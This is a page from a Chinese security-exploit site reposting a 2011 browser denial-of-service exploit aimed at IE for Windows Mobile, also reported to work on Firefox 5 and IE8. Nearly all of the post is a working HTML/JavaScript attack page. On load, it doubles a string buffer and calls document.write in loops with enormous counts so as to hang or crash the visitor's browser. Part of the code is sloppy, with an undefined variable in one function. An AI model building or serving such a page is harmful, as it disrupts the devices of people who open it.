首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IE for Windowse Mobile Denial of Service
来源:vfocus.net 作者:Halavati 发布时间:2011-08-22  
=====================================
IE for Windowse Mobile Denial of Service
=====================================

#Tested on:Firefox 5,IE8,IE for Windowse Mobile
# Author: Iman Halavati
# Verified: yes
##Greets To: My Laptop &  all My Friends(Sina Yazdanmehr)
##########################################################
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = '\x00\x13\xE8\x7C';
for (i =0;i<666;i++) {
buffer+=buffer+'\x00\x13\xE8\x7C';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
function Loop() {
var ajax = 'x13\xEC\0C';
for (a =0;a<99999999999;a++) {
ajax+=ajax+'x13\xEC\0C';
document.write('<html><marquee><h1>'+b+b);
}
}
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('Ooops')
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opera Web Browser 11.50 DoS
·WAR-FTP Remote Buffer Overflow
·Zen Media Player (.pls) Local
·WAR-FTP Remote Buffer Overflow
·iPhone Safari Remote Crash
·XlightFTP Server v3.7.0 Remote
·Symantec System Center Alert M
·Symantec System Center Alert M
·VU Player stack buffer overflo
·HP Easy Printer Care XMLSimple
·Moyea FLV Player(.flv)Local Cr
·Apache httpd Remote Denial of
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved